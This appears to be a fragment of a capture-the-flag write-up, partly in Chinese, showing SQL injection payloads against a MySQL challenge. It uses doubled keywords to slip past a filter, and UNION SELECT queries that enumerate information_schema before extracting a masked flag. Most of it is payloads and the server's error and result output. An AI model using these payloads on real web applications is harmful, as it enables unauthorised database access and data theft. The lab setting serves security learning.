1' ununionion seselectlect 1 frofromm information_schema.tables where '1'='1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ununionion seselectlect 1 frofromm information_schema.tables '1'='1'' at line 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'unionselecttable_name frominformation_schema.tables where'1'='1'' at line 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from where table_name='flag'' at line 1
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'where table_name='flag'' at line 1
ID: 1' union select column_name from information_schema.columns where table_name='flag
name: baloteli
ID: 1' union select column_name from information_schema.columns where table_name='flag
name: flag
ID: 1' union select column_name from information_schema.columns where table_name='flag
name: id
找到特殊列flag
直接查询flag:
1' unionunion selectselect flag fromfrom flag wherewhere '1'='1
ID: 1' union select flag from flag where '1'='1
name: baloteli
ID: 1' union select flag from flag where '1'='1
name: flag{******}